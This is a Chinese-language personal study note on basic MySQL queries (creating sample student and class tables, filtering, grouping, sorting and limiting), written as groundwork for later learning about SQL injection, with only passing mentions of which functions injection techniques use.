0x00 写在前面
MySQL本来是不想写的,基础的增删改查没什么难度,但感觉有些地方还是可以结合前辈实例去理解注入原理,也为下面的php+mysql做铺垫,软件采用navicat。
0x01 创建数据进行操作
首先可以随便创建一个数据库ceshi,然后按照下面的操作依次创建对应的表并且输入相应数据,
创建student表
create table student(
-> id int not null primary key auto_increment,
-> name varchar(10) not null,
-> age int not null,
-> classId int not null
-> );
给student表插入数据
insert into student(name,age,classId) values("诸葛亮",21,1),("诸葛瑾",25,2),("张飞",30,1),("张辽",32,3),("郭嘉",22,3),("关羽",28,1),("典韦",27,3),("许诸",41,3),("赵云",20,1),("陈宫",32,5),("周瑜",24,2),("陆逊",18,2),("曹仁",33,3),("夏侯渊",32,3);
创建class表
create table class(
-> id int not null primary key auto_increment,
-> className varchar(10) not null
-> );
给class表插入数据
insert into class(className) values("蜀国"),("吴国"),("魏国");
常用的sql语句操作,主要用来熟悉运算符的用法,有些地方忘记
select * from student where age>30; //查询student表里面age大于30岁的数据
select * from student where age>30 and classId=3; //查询student表里面age大于30并且classId=3的数据
select * from student where age>30 or classId=3; //查询student表里面age大于30或者classId=3的数据
select * from student where age between 25 and 32; //between的用法
select * from student where name like "%张%"; //like搜索匹配,常用like %xxxxx%
常用且简单的函数用法
1.floor报错注入原理我记得是用到count(*)、group by的
/*假如遇到which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by问题,直接在命令行里面敲入即可
SET SESSION sql_mode=(SELECT REPLACE(@@sql_mode,'ONLY_FULL_GROUP_BY,','')); */
select * from student group by classId; //group by 用于分组
select count(*) from student; //count函数用于计数
select max(age) from student; //max最大值
select id,name,classId from student where age=(select max(age) from student); //嵌套
2.having对统计的数据进一步筛选,是结合group by一起使用的
select * from student group by classId having age>25;
3.order by 排序函数,可结合sql注入
select * from student order by age; //按age排序,默认从小到大
select * from student order by age desc; //从达到小排序用desc
4.limit函数,可结合结合sql注入
limit(0,1) //经典的从第零个数据开始,查询一个
select * from student order by age asc limit 3,2;
select * from student; //可以在navicat查询,前后比对
0x02 有些忘记的数据操作
深夜来临,又是沙雕的一天。
create database ceshi charset="utf8"; 创建数据库名ceshi,指定编码为utf8
show create database ceshi; 查看数据库ceshi
insert into t2(id,name,age) values(3,"小明",20);
set names utf8; 设置网站编码
select current_time(); 查看当前时间,时分秒
select now(); 查看当前时间,年月日+时分秒
like %xxx% 匹配到xxx,查询使用